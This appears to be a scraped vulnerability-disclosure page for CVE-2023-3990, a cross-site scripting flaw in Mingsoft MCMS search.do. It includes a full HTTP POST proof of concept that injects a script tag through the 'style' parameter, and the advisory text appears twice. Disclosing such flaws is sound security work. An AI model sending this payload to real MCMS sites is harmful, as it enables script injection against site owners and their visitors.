Headline
CVE-2023-3990: 政务版存在xss跨站脚本攻击 · Issue #I7K4DQ · 铭飞/MCMS - Gitee.com
A vulnerability classified as problematic has been found in Mingsoft MCMS up to 5.3.1. This affects an unknown part of the file search.do of the component HTTP POST Request Handler. The manipulation of the argument style leads to cross site scripting. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. It is recommended to apply a patch to fix this issue. The associated identifier of this vulnerability is VDB-235611.
操作步骤:
http://ip:port/mcms/search.do
POST /mcms/search.do HTTP/1.1
Host: ip:port
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
Content-Length: 59
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7
Content-Type: application/x-www-form-urlencoded
Cookie: SHRIOSESSIONID-GOV=4b791a23-fd28-468c-8f24-9d303aebc88f
Origin: http://ip:port
Referer: http://ip:port/
Upgrade-Insecure-Requests: 1
Accept-Encoding: gzip
content_title=1&style=%3CScRiPt%3Ealert(123)%3C%2FScRiPt%3E
Related news
A Cross-site Scripting vulnerability has been found in Mingsoft MCMS up to 5.3.1. This affects an unknown part of the file search.do of the component HTTP POST Request Handler. The manipulation of the argument style leads to cross site scripting. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. It is recommended to apply a patch to fix this issue. The associated identifier of this vulnerability is VDB-235611.